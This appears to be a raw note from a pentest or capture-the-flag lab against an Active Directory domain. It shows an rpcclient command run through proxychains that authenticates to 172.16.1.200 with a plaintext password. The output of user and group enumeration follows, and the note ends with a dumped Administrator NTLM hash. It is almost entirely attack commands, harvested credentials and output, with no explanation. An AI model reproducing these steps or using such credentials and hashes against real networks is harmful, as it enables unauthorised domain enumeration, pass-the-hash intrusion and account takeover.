RPC
proxychains rpcclient -U "joe" --password='Dev0ftheyear!' 172.16.1.200Domain Users
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[joe] rid:[0x44f]
user:[joe_adm] rid:[0x450]
Domain Groups
rpcclient $> enumdomgroups
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[Enterprise Key Admins] rid:[0x20f]
group:[DnsUpdateProxy] rid:[0x44e]
group:[Workstation Admins] rid:[0x451]Administrator:500:aad3b435b51404eeaad3b435b51404ee:8f6aaf1438d78c89c4636179e3ae18ea::: aad3b435b51404eeaad3b435b51404ee:8f6aaf1438d78c89c4636179e3ae18ea